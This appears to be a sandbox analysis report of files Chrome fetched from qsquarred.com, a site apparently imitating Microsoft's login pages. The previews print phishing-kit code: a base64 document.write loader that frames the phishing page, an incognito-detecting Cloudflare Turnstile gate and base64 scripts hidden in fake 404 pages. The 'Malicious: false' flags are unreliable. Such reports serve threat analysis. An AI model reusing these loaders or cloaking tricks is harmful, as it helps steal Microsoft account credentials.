                                              Preview:<!doctype html><html><head><meta charset="utf-8"></head><body><script>document.write(atob("PCFkb2N0eXBlIGh0bWw+PGh0bWw+PGhlYWQ+PG1ldGEgY2hhcnNldD0idXRmLTgiPjxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MSI+PC9oZWFkPjxib2R5IHN0eWxlPSJtYXJnaW46MDtwYWRkaW5nOjAiPjxpZnJhbWUgc3JjPSJodHRwczovL3FzcXVhcnJlZC5jb20vP3NpZ249ZXlKaGJHY2lPaUpJVXpJMU5pSXNJblI1Y0NJNklrcFhWQ0o5LmV5SjFjbXdpT2lKb2RIUndjem92TDNGemNYVmhjbkpsWkM1amIyMHZJaXdpWkc5dFlXbHVJam9pY1hOeGRXRnljbVZrTG1OdmJTSXNJbXRsZVNJNklrWlphMG80UmpSVVZISnJWQ0lzSW5KbFppSTZiblZzYkN3aWFXRjBJam94TnpRek1Ea3hOemN5TENKbGVIQWlPakUzTkRNd09URTRPVEo5Lkx6c3RDT3ZoclhGU0ZUUTVLMktXeUZOUFRiQTBieWo5eEY1eG84SzRENk0iIHN0eWxlPSJ3aWR0aDoxMDAlO2hlaWdodDoxMDB2aDtib3JkZXI6bm9uZTsiPjwvaWZyYW1lPjwvYm9keT48L2h0bWw+"));</script></body></html>
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 76 x 3, 8-bit/color RGB, non-interlaced
                                              Category:downloaded
                                              Size (bytes):61
                                              Entropy (8bit):4.068159130770307
                                              Encrypted:false
                                              SSDEEP:
                                              MD5:DE4A93912D7E830CF773CEEBE29BCBAB
                                              SHA1:2F2AFA3AC11DF2A2835E2F2263484651E7968725
                                              SHA-256:88B8F389497FE3F2E35E78E018FD22302766552470A21D9CA178C35E547E58FF
                                              SHA-512:0752A485B2B608148E1922AAAFB6642A0D79B0D32CA62CE30233175BF423CA3747C13B4A128557E43485E4F0E8CD5BBAEF8225F1462C0AB1D82B41630F2731FE
                                              Malicious:false
                                              Reputation:unknown
                                              URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/d/9270269dc843c451/1743091753670/NCiEr2lNZQ8amFY
                                              Preview:.PNG........IHDR...L...........~.....IDAT.....$.....IEND.B`.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:HTML document, ASCII text, with very long lines (829), with no line terminators
                                              Category:downloaded
                                              Size (bytes):829
                                              Entropy (8bit):5.717153867090583
                                              Encrypted:false
                                              SSDEEP:
                                              MD5:07D32845F1D615EF23D7399515C828E5
                                              SHA1:35031CF5A99C1D2663F710F55DABDA05B43F406C
                                              SHA-256:01997F0B662CCCAAF1319BDDDE6A8CF54E2A61DDC6E137DDA73587B7554F718A
                                              SHA-512:19DCC5D98DA4A92F5379A7722500132007BCCFE3E00016625FCB171102B1EFFEAA8B4EC6591FC5129C19B516DB9D7FAE0C20E620A424F0905ABEDA98C1278B9D
                                              Malicious:false
                                              Reputation:unknown
                                              URL:https://qsquarred.com/aadcdn.msftauth.net/~/shared/1.0/content/js/oneDs_641b1cf809bdc17b42ab.js
                                              Preview:<!DOCTYPE html><html><head><script src="data:text/javascript;base64,ZnVuY3Rpb24gYygpe2lmKCFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuYiIpIHx8ICFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuZyIpKXtkb2N1bWVudC5oZWFkLmFwcGVuZENoaWxkKE9iamVjdC5hc3NpZ24oZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgiZGl2Iikse2NsYXNzTGlzdDpbImIiXX0pKTtkb2N1bWVudC5kb2N1bWVudEVsZW1lbnQuc3R5bGUuZmlsdGVyPSJodWUtcm90YXRlKDRkZWcpIjtkb2N1bWVudC5oZWFkLmFwcGVuZENoaWxkKE9iamVjdC5hc3NpZ24oZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgiZGl2Iikse2NsYXNzTGlzdDpbImciXX0pKTtzZXRUaW1lb3V0KGMsMWUzKX19YygpOwo="></script><title>WebContentNotFound</title></head><body><h1>The requested content does not exist.</h1><p><ul><li>HttpStatusCode: 404</li><li>ErrorCode: WebContentNotFound</li><li>RequestId : 40d993a1-c01e-0001-7f32-9fdebb000000</li><li>TimeStamp : 2025-03-27T16:05:31.0840437Z</li></ul></p></body></html>
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:SVG Scalable Vector Graphics image
                                              Category:downloaded
                                              Size (bytes):3651
                                              Entropy (8bit):4.094801914706141
                                              Encrypted:false
                                              SSDEEP:
                                              MD5:EE5C8D9FB6248C938FD0DC19370E90BD
                                              SHA1:D01A22720918B781338B5BBF9202B241A5F99EE4
                                              SHA-256:04D29248EE3A13A074518C93A18D6EFC491BF1F298F9B87FC989A6AE4B9FAD7A
                                              SHA-512:C77215B729D0E60C97F075998E88775CD0F813B4D094DC2FDD13E5711D16F4E5993D4521D0FBD5BF7150B0DBE253D88B1B1FF60901F053113C5D7C1919852D58
                                              Malicious:false
                                              Reputation:unknown
                                              URL:https://qsquarred.com/aadcdn.msftauth.net/~/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg
                                              Preview:<svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0,0,1,.419-.967,1.413,1.413,0,0,1,1-.39,1.392,1.392,0,0,1,1.02.4,1.3,1.3,0,0,1,.4.958,1.248,1.248,0,0,1-.414.953,1.428,1.428,0,0,1-1.01.385A1.4,1.4,0,0,1,47.25,6.6a1.261,1.261,0,0,1-.409-.948M49.41,18.4H47.081V8.507H49.41Zm7.064-1.694a3.213,3.213,0,0,0,1.145-.241,4.811,4.811,0,0,0,1.155-.635V18a4.665,4.665,0,0,1-1.266.481,6.886,6.886,0,0,1-1.554.164,4.707,4.707,0,0,1-4.918-4.908,5.641,5.641,0,0,1,1.4-3.932,5.055,5.055,0,0,1,3.955-1.545,5.414,5.414,0,0,1,1.324.168,4.431,4.431,0,0,1,1.063.39v2.233a4.763,4.763,0,0,0-1.1-.611,3.184,3.184,0,0,0-1.15-.217,2.919,2.919,0,0,0-2.223.9,3.37,3.37,0,0,0-.847,2.416,3.216,3.216,0,0,0,.813,2.338,2.936,2.936,0,0,0,2.209.837M65.4,8.343a2.952,2.952,0,0,1,.5.039,2.1,2.1,0,0,1,.375.1v2.358a2.04,2.04,0,0,0-.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:HTML document, ASCII text
                                              Category:dropped
                                              Size (bytes):2369
                                              Entropy (8bit):4.670127273213969
                                              Encrypted:false
                                              SSDEEP:
                                              MD5:2425C1425212CAC1B766FD7DC97CB3DF
                                              SHA1:B9AB4FFC52F5C25508E1BB1C58291BAA549013C1
                                              SHA-256:7266AD475843798CE7C9F9835589AD86A16F3D08B73835B8D848211C86757188
                                              SHA-512:E9AB4D88F8732CEC5BF79D50F0D9CAFC369E99A0BB180EA9F42C08D0B4F990F5CD0CD3126000AAF7D73FB37B941A4A9539F4EF9DAD9FC026DA32F61652A55720
                                              Malicious:false
                                              Reputation:unknown
                                              Preview:<!doctype html>.<html lang="en-US">.<head>. <meta charset="utf-8">. <meta name="viewport" content="width=device-width, initial-scale=1">. <title>One more step before you proceed...</title>. <script src="https://cdn.jsdelivr.net/gh/Joe12387/detectIncognito@main/dist/es5/detectIncognito.min.js"></script>. <script async defer src="https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallback"></script>. <script>. let isPrivateMode = false;.. // Check only for Chrome incognito. detectIncognito().then((result) => {. isPrivateMode = (result.browserName === 'Chrome' && result.isPrivate);. console.log('Is Chrome Incognito:', isPrivateMode);. });.. var verifyCallback_CF = function(response) {. if (response && response.length > 10) {. var cfForm = document.querySelector("#cfForm");. cfForm.querySelector('input[name="chromeIncognito"]').value = isPrivateMode ?
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:HTML document, ASCII text, with very long lines (829), with no line terminators
                                              Category:downloaded
                                              Size (bytes):829
                                              Entropy (8bit):5.7345548669067
                                              Encrypted:false
                                              SSDEEP:
                                              MD5:D6131A501EE6D119ED6A894DF52AF5DC
                                              SHA1:3F7754B24923550C7FE166444187F195EDE4C02B
                                              SHA-256:CB45913FB815279C665C947B82DD5B24F2DD529FE4737888DED70F835205AC9F
                                              SHA-512:1C91FEFAA5FEB6E8EC6DB096B6D0B7EDC0ED1484190D4A2BCC64E8A595DB9136D2E255B38A86F970D46502E9C704EE42D8242232765513814E5BBC7EDC58DC59
                                              Malicious:false
                                              Reputation:unknown
                                              URL:https://qsquarred.com/aadcdn.msftauth.net/~/shared/1.0/content/images/signin-options_4e48046ce74f4b89d45037c90576bfac.svg
                                              Preview:<!DOCTYPE html><html><head><script src="data:text/javascript;base64,ZnVuY3Rpb24gYygpe2lmKCFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuYiIpIHx8ICFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuZyIpKXtkb2N1bWVudC5oZWFkLmFwcGVuZENoaWxkKE9iamVjdC5hc3NpZ24oZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgiZGl2Iikse2NsYXNzTGlzdDpbImIiXX0pKTtkb2N1bWVudC5kb2N1bWVudEVsZW1lbnQuc3R5bGUuZmlsdGVyPSJodWUtcm90YXRlKDRkZWcpIjtkb2N1bWVudC5oZWFkLmFwcGVuZENoaWxkKE9iamVjdC5hc3NpZ24oZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgiZGl2Iikse2NsYXNzTGlzdDpbImciXX0pKTtzZXRUaW1lb3V0KGMsMWUzKX19YygpOwo="></script><title>WebContentNotFound</title></head><body><h1>The requested content does not exist.</h1><p><ul><li>HttpStatusCode: 404</li><li>ErrorCode: WebContentNotFound</li><li>RequestId : e0c88c1f-801e-0088-0f32-9fb1c7000000</li><li>TimeStamp : 2025-03-27T16:09:36.7750320Z</li></ul></p></body></html>
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text
                                              Category:downloaded
                                              Size (bytes):689016
                                              Entropy (8bit):4.210696031972732
                                              Encrypted:false
                                              SSDEEP:
                                              MD5:3B72E939A304CE05F0CEAB4A0AC39DD9
                                              SHA1:B2CFD3CB1BD0EE53C795E040063D0F55F544D939
                                              SHA-256:CC58721894324D6F6F53B7FE4CB0D08F923AA75E52506C0A58D29E4390B7CEDD
                                              SHA-512:F4AF43BA51B76496C98A30F06D9903440C4957E18F82B09D2B9C706CAD5939446D8BAA4353FD0620A2F68CEA79878824CD2313594997F0F8403C13FF767E6112
                                              Malicious:false
                                              Reputation:unknown
                                              URL:https://qsquarred.com/aadcdn.msftauth.net/~/shared/1.0/content/js/ConvergedLogin_PCore_GjP1RdcVSKf6ASC7mgkR1g2.js
                                              Preview:!(function (e) {. function n(n) {. for (var t, i, o = n[0], r = n[1], s = 0, c = []; s < o.length; s++). (i = o[s]),. Object.prototype.hasOwnProperty.call(a, i) && a[i] && c.push(a[i][0]),. (a[i] = 0);. for (t in r) Object.prototype.hasOwnProperty.call(r, t) && (e[t] = r[t]);. for (d && d(n); c.length; ) c.shift()();. }. var t,. i = {},. a = { 22: 0 };. function o(n) {. if (i[n]) return i[n].exports;. var t = (i[n] = { i: n, l: !1, exports: {} });. return e[n].call(t.exports, t, t.exports, o), (t.l = !0), t.exports;. }. Function.prototype.bind ||. ((t = Array.prototype.slice),. (Function.prototype.bind = function (e) {. if ("function" != typeof this). throw new TypeError(. "Function.prototype.bind - what is trying to be bound is not callable". );. var n = t.call(arguments, 1),. i = n.length,. a = this,. o = function () {},. r = function () {. return (.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (3937)
                                              Category:downloaded
                                              Size (bytes):5270
                                              Entropy (8bit):5.474400542516616
                                              Encrypted:false
                                              SSDEEP:
                                              MD5:7B30772ECC161EDE21216D4430829ACB
                                              SHA1:1323174C192B1E970C4D8AD2D0E95032364C09C6
                                              SHA-256:4CABA20287EBAA975B3F24090C94A9CAEA10C880B692AC654456900D23996757
                                              SHA-512:8BC650C655F67F2D9F56503F3E45051F066C03C51ED8F46DF018D2DA9F0B87734199DE51E1A3366D71DBD6823E64B71F75F81BDA62D3282B79A4D3234E5B2FDF
                                              Malicious:false
                                              Reputation:unknown
                                              URL:https://cdn.jsdelivr.net/gh/Joe12387/detectIncognito@main/dist/es5/detectIncognito.min.js
                                              Preview:/*!. *. * detectIncognito v1.3.7. *. * https://github.com/Joe12387/detectIncognito. *. * MIT License. *. * Copyright (c) 2021 - 2025 Joe Rutkowski <Joe@dreggle.com>. *. * Permission is hereby granted, free of charge, to any person obtaining a copy. * of this software and associated documentation files (the "Software"), to deal. * in the Software without restriction, including without limitation the rights. * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell. * copies of the Software, and to permit persons to whom the Software is. * furnished to do so, subject to the following conditions:. *. * The above copyright notice and this permission notice shall be included in all. * copies or substantial portions of the Software.. *. * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR. * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,. * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE. * AUTHOR
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:Unicode text, UTF-8 text, with very long lines (32209)
                                              Category:downloaded
                                              Size (bytes):58645
                                              Entropy (8bit):5.369827766734305
                                              Encrypted:false
                                              SSDEEP:
                                              MD5:AF54A0E6CC4B28B24939ADB68552B4E2
                                              SHA1:B68E6AB4E26172814A836079305EC9AF8257D0E1
                                              SHA-256:7596A378126999C31D87AA95072F6068D3CC587F05A4088015079EEDF73678A6
                                              SHA-512:7B75B9E49543F0C4ED57BC57DF9ED02473866CD7D38EC77762A3C68C1AEE205969F27DDB262ED24F137625719AACB86176B2C9BB3E263CF5361B6735D4E160FC
                                              Malicious:false
                                              Reputation:unknown
                                              URL:https://qsquarred.com/aadcdn.msftauth.net/~/ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_r1sg5sxlkljjoa22hvk04g2.js
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (61177)
                                              Category:downloaded
                                              Size (bytes):113424
                                              Entropy (8bit):5.2850742719795925
                                              Encrypted:false
                                              SSDEEP:
                                              MD5:F3588C5412D4119F95E47073A4A5DF72
                                              SHA1:3C4B1652E71C25E1CE7DE611FBD17EDBAAE411D9
                                              SHA-256:6CC79C59F00478CE5D8EAA982EFDD8FC3CC205A7EA023A564BB2688FA206A087
                                              SHA-512:62886F8BFB32D2BE842A23ECA157556C30EC1D616E2607D9DF1894F702BB7A982EEB3576C95F859B4B8E9183A84D70149A8802F31317F80D4845B02CCFA018F9
                                              Malicious:false
                                              Reputation:unknown
                                              URL:https://qsquarred.com/aadcdn.msftauth.net/~/ests/2.1/content/cdnbundles/converged.v2.login.min_81imvbluez-v5hbzpkxfcg2.css
                                              Preview:/*! Copyright (C) Microsoft Corporation. All rights reserved. *//*!.------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------..This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise...//-----------------------------------------------------------------------------.twbs-bootstrap-sass (3.3.0).//-----------------------------------------------------------------------------..The MIT License (MIT)..Copyright (c) 2013 Twitter, Inc..Permission is hereby granted, free of charge, to any person
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (48122)
                                              Category:downloaded
                                              Size (bytes):48123
                                              Entropy (8bit):5.342998089666478
                                              Encrypted:false
                                              SSDEEP:
                                              MD5:EA38BDA3C117E2FE01BD862003357394
                                              SHA1:767CCB3589E3067EE1B348DF2426A9E2E32CEE5C
                                              SHA-256:719423C7B70AC911F76D00B3AE514D108A8315EA60A80519820BE50C0E4C96EF
                                              SHA-512:F50FAB9DC2263F40216DF26C234AD390091F23185650E9B4E4748CF09CFEDF2D92A99FC81C986234580844393305AC2195E096DEDB64D9A25A99EF7BE510FFCA
                                              Malicious:false
                                              Reputation:unknown
                                              URL:https://challenges.cloudflare.com/turnstile/v0/b/708f7a809116/api.js
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:downloaded
                                              Size (bytes):56
                                              Entropy (8bit):4.860577243331642
                                              Encrypted:false
                                              SSDEEP:
                                              MD5:F220004BD2C441EC576F73CBEA83D539
                                              SHA1:127484ECE51FCB705C8FA91681CBE71AFBC06876
                                              SHA-256:F4014D5129917EE668E2AF3A51054CBF8C6B92DC35741328C643E6CE21B102D3
                                              SHA-512:5526E094B6DC023E7733B8A77A020BD52BB2D1342DAC93DEB473714E34734F2FB93824403518702DE53F02CDCD201A5B81CCA6FDFCE731D7921A1824A8062AE5
                                              Malicious:false
                                              Reputation:unknown
                                              URL:https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhIgCdM1pSi2JEkSEgUN0VtRUhIFDVd69_0hp18Ti6IuqkwSIAnw9fS3KICc9hIFDdFbUVISBQ1Xevf9IadfE4uiLqpM?alt=proto
                                              Preview:ChIKBw3RW1FSGgAKBw1Xevf9GgAKEgoHDdFbUVIaAAoHDVd69/0aAA==
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                              Category:dropped
                                              Size (bytes):61
                                              Entropy (8bit):3.990210155325004
                                              Encrypted:false
                                              SSDEEP:
                                              MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                              SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                              SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                              SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                              Malicious:false
                                              Reputation:unknown
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:downloaded
                                              Size (bytes):28
                                              Entropy (8bit):4.307354922057605
                                              Encrypted:false
                                              SSDEEP:
                                              MD5:9F9FA94F28FE0DE82BC8FD039A7BDB24
                                              SHA1:6FE91F82974BD5B101782941064BCB2AFDEB17D8
                                              SHA-256:9A37FDC0DBA8B23EB7D3AA9473D59A45B3547CF060D68B4D52253EE0DA1AF92E
                                              SHA-512:34946EF12CE635F3445ED7B945CF2C272EF7DD9482DA6B1A49C9D09A6C9E111B19B130A3EEBE5AC0CCD394C523B54DD7EB9BF052168979A9E37E7DB174433F64
                                              Malicious:false
                                              Reputation:unknown
                                              URL:https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhIgCfD19LcogJz2EgUN0VtRUhIFDVd69_0hzqteam2WCJo=?alt=proto
                                              Preview:ChIKBw3RW1FSGgAKBw1Xevf9GgA=
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:SVG Scalable Vector Graphics image
                                              Category:downloaded
                                              Size (bytes):1864
                                              Entropy (8bit):5.222032823730197
                                              Encrypted:false
                                              SSDEEP:
                                              MD5:BC3D32A696895F78C19DF6C717586A5D
                                              SHA1:9191CB156A30A3ED79C44C0A16C95159E8FF689D
                                              SHA-256:0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
                                              SHA-512:8D4F38907F3423A86D90575772B292680F7970527D2090FC005F9B096CC81D3F279D59AD76EAFCA30C3D4BBAF2276BBAA753E2A46A149424CF6F1C319DED5A64
                                              Malicious:false
                                              Reputation:unknown
                                              URL:https://qsquarred.com/aadcdn.msftauth.net/~/shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg
                                              No static file info